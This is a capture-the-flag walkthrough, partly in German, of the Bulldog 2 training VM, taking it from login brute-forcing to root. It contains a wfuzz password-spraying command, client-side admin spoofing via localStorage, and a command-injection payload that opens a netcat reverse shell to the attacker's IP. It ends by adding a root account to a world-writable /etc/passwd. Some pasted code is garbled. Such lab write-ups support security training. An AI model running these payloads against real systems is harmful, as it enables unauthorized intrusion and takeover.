Initial Access
Burp Suite
Request:
POST /users/authenticate HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
content-type: application/json
Content-Length: 49
Origin: http://192.168.2.112
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.112/login
Sec-GPC: 1
Priority: u=0
{
"username": "acsacsac",
"password": "csc"
}
Response:
HTTP/1.1 401 Unauthorized
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 Oct 2024 15:33:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 41
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"29-PaR2ao+BjJ1D0mR+rg2QmRvUow"
{"success":false,"msg":"Incorrect Login"}
Request:
POST /users/authenticate HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
content-type: application/json
Content-Length: 60
Origin: http://192.168.2.112
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.112/login
Sec-GPC: 1
Priority: u=0
{
"username": "acsacsac",
"password": "csc"
"id":"id"
}
Response:
HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 Oct 2024 15:34:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1059
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Security-Policy: default-src 'self'
SyntaxError: Unexpected string in JSON at position 49...
Request:
GET /users/getUsers?limit=9 HTTP/1.1
GET /users/getUsers HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.112/users
Sec-GPC: 1
If-None-Match: W/"203-jBv25pYD0TZiNkVkHls/dhIqaxM"
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 Oct 2024 15:45:38 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 895335
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"da967-2m2gIssXgQ92tBsCxgWuWScj3c"
[{"name":"Berna Phillips","username":"lrberna","rand":22},
{"name":"LeeAnn Pham","username":"anleeann","rand":5},
{"name":"Vijay Wells","username":"eivijay","rand":13},
....
....
┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.112/users/getUsers -s | jq | grep username | cut -f4 -d "\"" > users.txt
┌──(root㉿CCat)-[~]
└─# wfuzz -w users.txt -w /usr/share/wordlists/fasttrack.txt \
-H "Host: 192.168.2.112" \
-H "Accept: application/json, text/plain, */*" \
-H "Referer: http://192.168.2.112/login" \
-H "Content-Type: application/json" \
-d "{\"username\":\"FUZZ\",\"password\":\"FUZ2Z\"}" --hc=401 -t 125 -c http://192.168.2.112/users/authenticate
Target: http://192.168.2.112/users/authenticate
------------------------------------------------------------------------------------------------
ID Response Lines Word Chars Payload
------------------------------------------------------------------------------------------------
000002080: 200 0 L 3 W 454 Ch "mdrudie - qwerty"
Total time: 0
Processed Requests: 2605
Filtered Requests: 2604
Requests/sec.: 0
mdrudie
http://192.168.2.112/profile/mdrudie
Bulldog.social
Profile
Logout
Rudie Ramirez
Username: mdrudie
Email: rudieramirez@happymail.com
About Us | Twitter | Instagram
http://192.168.2.112/profile/mdrudie
function (l, n) {
var u = n.component;
l(n, 3, 0, l(n, 4, 0, '/')),
l(n, 12, 0, u.authService.isAdmin()),
l(n, 15, 0, u.authService.loggedIn()),
l(n, 18, 0, u.authService.loggedut()),
l(n, 21, 0, u.authService.loggedut()),
l(n, 24, 0, u.authService.loggedIn())
},
function (l, n) {
l(n, 2, 0, T['ɵnov'](n, 3).target, T['ɵnov'](n, 3).href)
}
)
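l.prototype.isAdmin = function () {
  // Client-side "admin" check. The role is read from localStorage, which the
  // browser user fully controls, so this only decides whether the "Admin"
  // link is rendered in the UI; it grants nothing on the server and can be
  // flipped by editing the stored `user` object in the devtools. Any admin
  // functionality must be authorized server-side, independently of this.
  // Returns true when a `user` entry exists and its auth_level is
  // 'master_admin_user'. (The pasted snippet had lost the `==`/`O`
  // characters; restored to parseable form.)
  var storedUser = localStorage.getItem('user');
  return null !== storedUser &&
    'master_admin_user' === JSON.parse(storedUser).auth_level;
},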
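l.prototype.storeUserData = function (l, n) {
  // Persists the session in localStorage: `l` is the token returned by the
  // server (stored under `id_token`), `n` is the user object (stored under
  // `user`, including its auth_level). Both are readable and writable from
  // the browser (F12 -> Local Storage), so nothing kept here can be trusted
  // for authorization decisions.
  // (Snippet deobfuscated with https://beehosting.pro/webtools/javascript-deobfuscator)
  localStorage.setItem('id_token', l);
  localStorage.setItem('user', JSON.stringify(n));
  this.authToken = l;
  this.user = n;
},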
l.prototype.authenticateUser = function (l) {
  // POSTs the credentials object `l` to /users/authenticate and resolves to
  // the parsed JSON body of the HTTP response.
  var pending = this.http.post('/users/authenticate', l);
  return pending.map(function (response) {
    return response.json();
  });
},
l.prototype.authenticateLinkUser = function (l) {
return this.http.post('/users/linkauthenticate', l).map(function (l) {
return l.json()
})
(l() (), T['ɵted']( - 1, null, [
'Admin Dashboard'
])),
(l() (), T['ɵted']( - 1, null, [
'\n '
])),
function (l, n) {
l(n, 1, 0, l(n, 4, 0, !0), l(n, 5, 0, 'active')),
l(n, 7, 0, l(n, 8, 0, '/dashboard'))
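l.prototype.isAdmin = function () {
  // Vulnerable function: the admin role is taken from localStorage, a value
  // the browser user controls, so this check only affects what the UI shows
  // (the "Admin" link) and provides no server-side authorization. Editing
  // the stored `user` object is enough to pass it. Admin routes must be
  // authorized on the server regardless of this result.
  // Returns true when a `user` entry exists and its auth_level is
  // 'master_admin_user'. (Garbled `==`/`O` characters in the paste restored.)
  var storedUser = localStorage.getItem('user');
  return null !== storedUser &&
    'master_admin_user' === JSON.parse(storedUser).auth_level;
},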
l.prototype.storeUserData = function (l, n) {
localStorage.setItem('id_token', l),
localStorage.setItem('user', JSN.stringify(n)),
this.authToken = l,
this.user = n
http://192.168.2.112/profile/mdrudie
F12/local Storage
id_token JWT eyJhbGciiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXlsb2FkIjp7Im5hbWUiiJSdWRpZSBSYW1pcmV6IiwiZW1haWwiiJydWRpZXJhbWlyZXpAaGFwcHltYWlsLmNvbSIsInVzZXJuYW1lIjoibWRydWRpZSIsImF1dGhfbGV2ZWwiiJzdGFuZGFyZF91c2VyIiwicmFuZCI6MjF9LCJpYXQijE3MzAzTI1MzYsImV4cCI6MTczMDk5NzMzNn0.M8jQhg0e2YlgWKjHIgxRHlk6dHdgDUZfpL7hbN1sw
user {"name":"Rudie Ramirez","username":"mdrudie","email":"rudieramirez@happymail.com","auth_level":"standard_user"}
http://192.168.2.112/users/linkauthenticate
Bulldog.social
Admin
Profile
Logout
https://github.com/Frichetten/Bulldog-2-The-Reckoning
https://github.com/Frichetten/Bulldog-2-The-Reckoning/blob/master/routes/users.js
router.post('/linkauthenticate', (req, res, next) => {
const username = req.body.password;
const password = req.body.password;
Proof of Concept: Privilege Escalation
Kurzbeschreibung
Die `/users/linkauthenticate`-Route verwendet fälschlicherweise das Passwortfeld sowohl für den Benutzernamen als auch für das Passwort.
Dies ermöglicht die Injektion von Shell-Befehlen in das Passwortfeld, um eine Reverse Shell zu starten.
Voraussetzungen
- Ein gültiger Benutzeraccount (z.B. mdrudie).
- Zugriff auf die Entwicklerwerkzeuge des Browsers.
Schritt-für-Schritt-Anleitung
- Melde dich mit dem gültigen Benutzeraccount (mdrudie) an.
- Manipuliere den Wert von `auth_level` im `localStorage` auf `master_admin_user`, um den "Admin"-Link im Menü anzuzeigen (die `isAdmin()`-Prüfung erfolgt ausschließlich clientseitig).
- Klicke auf den "Admin"-Link.
- Sende eine POST-Anfrage an `/users/linkauthenticate` mit dem folgenden JSON-Payload:
```json
{
"username": "admin",
"password": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444>/tmp/f"
}
```
Trage im Payload vor `4444` deine eigene IP-Adresse ein.
- Starte einen Netcat-Listener auf Port 4444 auf deinem System:
```bash
nc -lvnp 4444
```
Erwartetes Ergebnis
Du solltest eine Reverse Shell als Node-Benutzer auf deinem System erhalten.
Beweismittel
Die folgenden Code-Blöcke zeigen die Schritte zur Ausnutzung der Schwachstelle und den erfolgreichen Erhalt einer Reverse Shell.
Risikobewertung
Die Ausnutzung dieser Schwachstelle ermöglicht es einem Angreifer, Befehle auf dem Server als Node-Benutzer auszuführen.
Dies kann zu Datenverlust, Systemausfällen und anderen schwerwiegenden Folgen führen.
Empfehlungen
Behebe die Schwachstelle in der `/users/linkauthenticate`-Route: Lies den Benutzernamen aus `req.body.username` statt aus `req.body.password`, validiere beide Felder strikt und übergib Benutzereingaben niemals ungeprüft an eine Shell.
Implementiere zusätzliche Sicherheitsmaßnahmen, um die Auswirkungen einer erfolgreichen Ausnutzung zu minimieren.
Privilege Escalation
Request:
GET /users/linkauthenticate HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
If-Modified-Since: Sun, 15 Jul 2018 14:58:16 GMT
If-None-Match: W/"465-1649e73083e"
Priority: u=0, i
Content-Length: 125
{
"username": "admin",
"password": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 4444>/tmp/f"
}
Response:
HTTP/1.1 304 Not Modified
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 Oct 2024 18:07:45 GMT
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sun, 15 Jul 2018 14:58:16 GMT
ETag: W/"465-1649e73083e"
Request:
POST /users/linkauthenticate HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.112/profile/mdrudie
Sec-GPC: 1
If-None-Match: W/"79-hNsbyECh7xMFIuLYTiCgVBhu/hI"
Content-Length: 128
{
"username": "admin",
"password": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 4444>/tmp/f"
}
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 Oct 2024 18:13:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 40
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"28-44Xo62/YZrQm4R4i7yg1FLYkPXI"
{"success":false,"msg":"Wrong password"}
┌──(root㉿CCat)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.112] 46548
/bin/sh: 0: can't access tty; job control turned off
$
┌──(root㉿CCat)-[~]
└─# find / -type f -perm -4000 -ls 2>/dev/null
524374 44 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
524408 64 -rwsr-xr-x 1 root root 64424 Mar 9 2017 /bin/ping
524357 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
524657 44 -rwsr-xr-x 1 root root 44664 Nov 29 2022 /bin/su
524424 28 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
3634 20 -rwsr-xr-x 1 root root 18448 Mar 9 2017 /usr/bin/traceroute6.iputils
1955 24 -rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
9375 40 -rwsr-xr-x 1 root root 40344 Nov 29 2022 /usr/bin/newgrp
3676 44 -rwsr-xr-x 1 root root 44528 Nov 29 2022 /usr/bin/chsh
9548 148 -rwsr-xr-x 1 root root 149080 Apr 4 2023 /usr/bin/sudo
3678 76 -rwsr-xr-x 1 root root 75824 Nov 29 2022 /usr/bin/gpasswd
3178 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
3675 76 -rwsr-xr-x 1 root root 76496 Nov 29 2022 /usr/bin/chfn
9567 40 -rwsr-xr-x 1 root root 37136 Nov 29 2022 /usr/bin/newgidmap
3679 60 -rwsr-xr-x 1 root root 59640 Nov 29 2022 /usr/bin/passwd
9569 40 -rwsr-xr-x 1 root root 37136 Nov 29 2022 /usr/bin/newuidmap
3828 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
141245 80 -rwsr-xr-x 1 root root 80056 Aug 1 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
40072 428 -rwsr-xr-x 1 root root 436552 Aug 11 2021 /usr/lib/openssh/ssh-keysign
1957 16 -rwsr-xr-x 1 root root 14328 Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
62807 128 -rwsr-xr-x 1 root root 130264 May 29 2023 /usr/lib/snapd/snap-confine
39748 44 -rwsr-xr-- 1 root messagebus 42992 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
66 40 -rwsr-xr-x 1 root root 40152 Jun 14 2022 /snap/core/16202/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/16202/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/16202/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Nov 29 2022 /snap/core/16202/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jun 14 2022 /snap/core/16202/bin/umount
2646 71 -rwsr-xr-x 1 root root 71824 Nov 29 2022 /snap/core/16202/usr/bin/chfn
2648 40 -rwsr-xr-x 1 root root 40432 Nov 29 2022 /snap/core/16202/usr/bin/chsh
2725 74 -rwsr-xr-x 1 root root 75304 Nov 29 2022 /snap/core/16202/usr/bin/gpasswd
2817 39 -rwsr-xr-x 1 root root 39904 Nov 29 2022 /snap/core/16202/usr/bin/newgrp
2830 53 -rwsr-xr-x 1 root root 54256 Nov 29 2022 /snap/core/16202/usr/bin/passwd
2940 134 -rwsr-xr-x 1 root root 136808 May 24 2023 /snap/core/16202/usr/bin/sudo
3039 42 -rwsr-xr-- 1 root systemd-resolve 42992 Sep 14 2023 /snap/core/16202/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3411 419 -rwsr-xr-x 1 root root 428240 Aug 8 2023 /snap/core/16202/usr/lib/openssh/ssh-keysign
6485 125 -rwsr-xr-x 1 root root 127656 Sep 18 2023 /snap/core/16202/usr/lib/snapd/snap-confine
7673 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/16202/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jun 14 2022 /snap/core/17200/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/17200/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/17200/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Feb 7 2024 /snap/core/17200/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jun 14 2022 /snap/core/17200/bin/umount
2644 71 -rwsr-xr-x 1 root root 71824 Feb 7 2024 /snap/core/17200/usr/bin/chfn
2646 40 -rwsr-xr-x 1 root root 40432 Feb 7 2024 /snap/core/17200/usr/bin/chsh
2723 74 -rwsr-xr-x 1 root root 75304 Feb 7 2024 /snap/core/17200/usr/bin/gpasswd
2815 39 -rwsr-xr-x 1 root root 39904 Feb 7 2024 /snap/core/17200/usr/bin/newgrp
2828 53 -rwsr-xr-x 1 root root 54256 Feb 7 2024 /snap/core/17200/usr/bin/passwd
2938 134 -rwsr-xr-x 1 root root 136808 May 24 2023 /snap/core/17200/usr/bin/sudo
3037 42 -rwsr-xr-- 1 root systemd-resolve 42992 Sep 14 2023 /snap/core/17200/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3409 419 -rwsr-xr-x 1 root root 428240 Jan 9 2024 /snap/core/17200/usr/lib/openssh/ssh-keysign
6483 125 -rwsr-xr-x 1 root root 127520 Jun 6 14:32 /snap/core/17200/usr/lib/snapd/snap-confine
7666 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/17200/usr/sbin/pppd
$ curl
/bin/sh: 2: curl: not found
$ which python
/usr/bin/python
node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ cd ~
node@bulldog2$ ls -la
total 32
drwxr-xr-x 3 node node 4096 Jul 15 2018 .
drwxr-xr-x 4 root root 4096 Jul 15 2018 ..
-rw-rw-r-- 1 node node 85 Jul 15 2018 .bash_history
-rw-r--r-- 1 node node 220 Jul 15 2018 .bash_logout
-rw-r--r-- 1 node node 3771 Jul 15 2018 .bashrc
-rw- 1 node node 10 Jul 15 2018 .node_repl_history
drwxrwxr-x 5 node node 4096 Oct 31 14:58 .pm2
-rw-r--r-- 1 node node 807 Jul 15 2018 .profile
node@bulldog2$ cat .bash_history
history
shred -u ~/.bash_history && touch ~/.bash_history
history
exit
history
exit
node@bulldog2$ cd /home/
node@bulldog2:/home$ ls
admin node
node@bulldog2:/home$ cd admin/
node@bulldog2:/home/admin$ ls -la
total 60
drwxr-xr-x 8 admin admin 4096 Jul 15 2018 .
drwxr-xr-x 4 root root 4096 Jul 15 2018 ..
-rw-r--r-- 1 admin admin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 admin admin 15 Jul 15 2018 .bashrc
drwx 2 admin admin 4096 Jul 15 2018 .cache
drwx 3 root root 4096 Jul 15 2018 .config
-rw- 1 admin admin 236 Jul 15 2018 .dbshell
drwx 3 admin admin 4096 Jul 15 2018 .gnupg
-rw- 1 admin admin 0 Jul 15 2018 .mongorc.js
drwxr-xr-x 3 admin admin 4096 Jul 15 2018 .node-gyp
drwxr-xr-x 6 admin admin 4096 Jul 15 2018 .npm
drwxr-xr-x 5 root root 4096 Jul 15 2018 .pm2
-rw-r--r-- 1 admin admin 807 Apr 4 2018 .profile
-rw-r--r-- 1 admin admin 0 Jul 15 2018 .sudo_as_admin_successful
-rw- 1 root root 8307 Jul 15 2018 .viminfo
node@bulldog2:/home/admin$ find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
-rwxrwxrwx 1 root root 1653 Jul 15 2018 /etc/passwd
-rw-rw-rw- 1 root root 0 ct 31 14:58 /sys/kernel/security/apparmor/.access
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/user.slice/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/apport.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/snap-core-16202.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/pm2-node.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/snap-core-17200.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/atd.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lxd.socket/cgroup
...
...
....
node@bulldog2:/home/admin$ ls -la /etc/passwd
-rwxrwxrwx 1 root root 1653 Jul 15 2018 /etc/passwd
node@bulldog2:/tmp$ nano /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106/home/syslog:/usr/sbin/nologin
messagebus:x:103:107/nonexistent:/usr/sbin/nologin
_apt:x:104:65534/nonexistent:/usr/sbin/nologin
lxd:x:105:65534/var/lib/lxd/:/bin/false
uuidd:x:106:110/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1/var/cache/pollinate:/bin/false
sshd:x:110:65534/run/sshd:/usr/sbin/nologin
admin:x:1000:1004:admin:/home/admin:/bin/bash
mongodb:x:111:65534/home/mongodb:/usr/sbin/nologin
node:x:1001:1005:,,,:/home/node:/bin/bash
darkspirit:$6$EZdVo4XckcU2BJJi$IanX1gZA.t1nk2EgRy1SBDPGa69dLrCqv3eznvqru062GCQ6Eh7VQyXI3lKgsdItq3F/uMWs/VU/TR2E1tzF0:0:0:root:/root:/bin/bash
node@bulldog2:/tmp$ su darkspirit
Password:
root@bulldog2:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@bulldog2:/tmp# cd ~
root@bulldog2: ls
flag.txt
root@bulldog2: cat flag.txt
Congratulations on completing this VM :D That wasn't so bad was it?
Let me know what you thought on twitter, I'm @frichette_n
I'm already working on another more challenging VM. Follow me for updates.